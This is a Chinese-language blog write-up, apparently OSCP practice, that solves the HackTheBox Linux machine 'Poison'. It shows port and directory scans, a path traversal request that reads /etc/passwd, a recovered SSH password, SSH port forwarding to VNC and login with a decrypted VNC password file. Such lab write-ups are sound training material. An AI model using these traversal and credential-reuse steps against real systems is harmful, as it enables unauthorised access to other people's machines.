OSCP备考_0x09_HackThBox靶机_Linux_Poison

Ethan医生4个月前靶场129

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 

image.png


nmap -sU --top-ports 100 10.129.240.214

image.png


gobuster dir -u http://10.129.240.214/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html


image.png

http://10.129.240.214/browse.php?file=../../../../../../etc/passwd  有读取文件配置漏洞

image.png

http://10.129.240.214/info.php

image.png


image.png

http://10.129.240.214/browse.php?file=pwdbackup.txt

image.png


得到一个用户charix,解码BASE64 13次以后,Charix!2#4%6&8(0 尝试ssh登录

image.png

开始操作提权

本地操作

scp charix@10.129.240.214:/home/charix/secret.zip ../ ,需要解密密码就是Charix!2#4%6&8(

打开结果是乱码...


直接上传linpeas.sh查看有没有啥可用的漏洞

image.png

vnc是基于UNIX和Linux操作系统的免费的远程控制工具。


通常该服务是开放在5901端口
先进行本地端口转发

ssh -L 2223:127.0.0.1:5901 charix@10.10.10.84 -N

尝试连接vnc发现需要账号密码,试了用户charix的ssh密码发现登录不上去,此时想到上面ssh连接到用户charix的时候当前家目录含有secret.zip文件。通过scp拷贝到本地kali使用unzip命令进行解压,发现也要密码,擦,再使用charix用户的ssh密码尝试,居然成功了,cat读取发现是乱码,到了此处连接vnc的时候发现派上用场了,查看了vnc相关的文档,可以使用passwd参数指定密码文件进行登录vnc,具体如下:

vncviewer 127.0.0.1::2223 -passwd secret


image.png

image.png

716d04b188419cf2bb99d891272361f5


标签: OSCP

相关文章

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

OSCP备考_0x13_HackThBox靶机_Linux_FriendZone

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.62.153 (扫描TCP)nmap -sU --top-ports 100 10.129.62....

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。